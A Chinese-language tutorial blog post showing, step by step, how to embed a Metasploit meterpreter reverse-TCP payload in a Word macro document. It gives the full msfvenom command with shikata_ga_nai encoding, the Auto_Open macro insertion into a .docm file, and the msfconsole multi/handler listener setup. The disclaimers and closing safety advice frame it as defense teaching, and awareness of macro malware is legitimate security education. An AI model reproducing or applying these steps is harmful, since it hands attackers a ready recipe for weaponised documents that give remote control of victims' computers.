作者：小刚
一位苦于信息安全的萌新小白帽，记得关注给个赞，谢谢
本实验仅用于信息防御教学，切勿用于其它用途

Word宏添加木马病毒

• 前言
• 创建木马word
• • 1.生成木马代码
  • 2.创建word文件
  • 3.打开msf监听
• 注意
• ==本文只是普及防木马和信息防御教学，切勿用于其他用途。==

前言

我们知道windows和inux的软件等等很容易被植入木马或者病毒。
但你们知道word和excel文件依旧可以植入木马吗？
office有个功能叫做宏，通常情况下是关闭状态，当有宏操作时候会提示你已经禁止了宏，问你咋整

这情况普通人绝对遇到过，当你打开一个有木马的word文档时候，如果你的office设置自动运行宏或者你无意识点击了启用宏，那么你十有八九电脑被控制了。就算你关闭了程序，对方依旧能够控制你电脑（老可怕了）。

创建木马word

1.生成木马代码

（只是普及知识，不能干坏事啊）
我们需要一台kali，能连通，能运行metasploit就行（简称msf）
msf有个命令msfvenom，这个命令是用来制作各种后台木马的，利用这个命令创建一个vba的代码加入到word宏中。

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.131 LPOST=4444 -b "\x00" -e x86/shikata_ga_nai -i 9 -f vba-exe

命令具体内容就不解释了，懂得都懂。（不懂再来问我）
这个命令会生成两种代码
第一种宏代码需要添加到宏中
另一部分16进制代码添加到文本当中
我先把生成的代码复制出来。

2.创建word文件

创建word文件（word2007版本以上的都行），新建的word格式是docx，但这种格式添加的宏经我测试发给别人不管用，所以先另存为另一个格式docm

然后在123.docm文件加入宏，在功能栏视图->宏，点开就行
（你们打开可能和我显示不一样，但操作相同）

宏名随便填，最好英文格式，宏的位置选择你的这个文档，然后创建。

选择所有的内容删除，然后添加生成的宏代码Sub Auto_Open()…End Sub然后保存。

在word文本中添加生成的16进制代码，保存即可。

3.打开msf监听

这里就快速带过了啊

msfconsole
use exploit/multi/handler
set LHOST 192.168.1.131
set LPORT 4444
set payload windows/meterpreter/reverse_tcp
run

开始监听
然后用打开已经弄好的word文档。
当你一点击运行宏，你自己感受不到，但kali已经把你系统控制了（可以为所欲为了）。
就算你关闭word文档，控制仍然存在，除非你关机。
同理excel也能实现此功能哦

注意

本次实验只是简单的操作一下
提醒大家不要随意打开不知名的word文档，这种简单的操作虽然吓人，但你电脑只要安装了杀毒软件，基本就没有危险。
但是如果大佬们进行了免杀操作，这可就说不准了。
记住一点就是不要随意下载不知名的网站，不要让自己的电脑裸奔，看到报毒不要存在侥幸心理点开。

本文只是普及防木马和信息防御教学，切勿用于其他用途。